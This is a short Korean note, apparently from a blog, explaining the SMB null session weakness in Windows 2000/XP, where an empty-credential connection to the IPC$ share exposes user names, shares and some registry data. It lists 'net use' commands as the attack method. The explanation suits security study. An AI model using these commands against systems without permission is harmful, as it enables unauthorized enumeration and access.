본문으로 바로가기

SMB Null Session 공격

NetBIOS를 이용하여 공유폴더 IPC$ 등으로 ID와 PW를 공란(null) 으로 요청하면 세션이 성립되는 시스템 취약점을 이용한 공격

이 취약점을 이용하여 시스템의 유저명과 공유 정보를 열람할 수 있으며, 레지스트리 HKEY_LOCAL_MACHINE 의 일부에도 접근 가능

윈도우 2000/XP 에서 취약하다.


공격방법

net use \\[공격서버IP]\ipc$ "" /user:""

net use \\[공격서버IP]\ipc$ "[Password]" /user:"[USER ID]"


References

https://puriha.blog.me/220294518110

https://blog.naver.com/lolspeedup/220354611020

https://blog.naver.com/p_rain/220676947051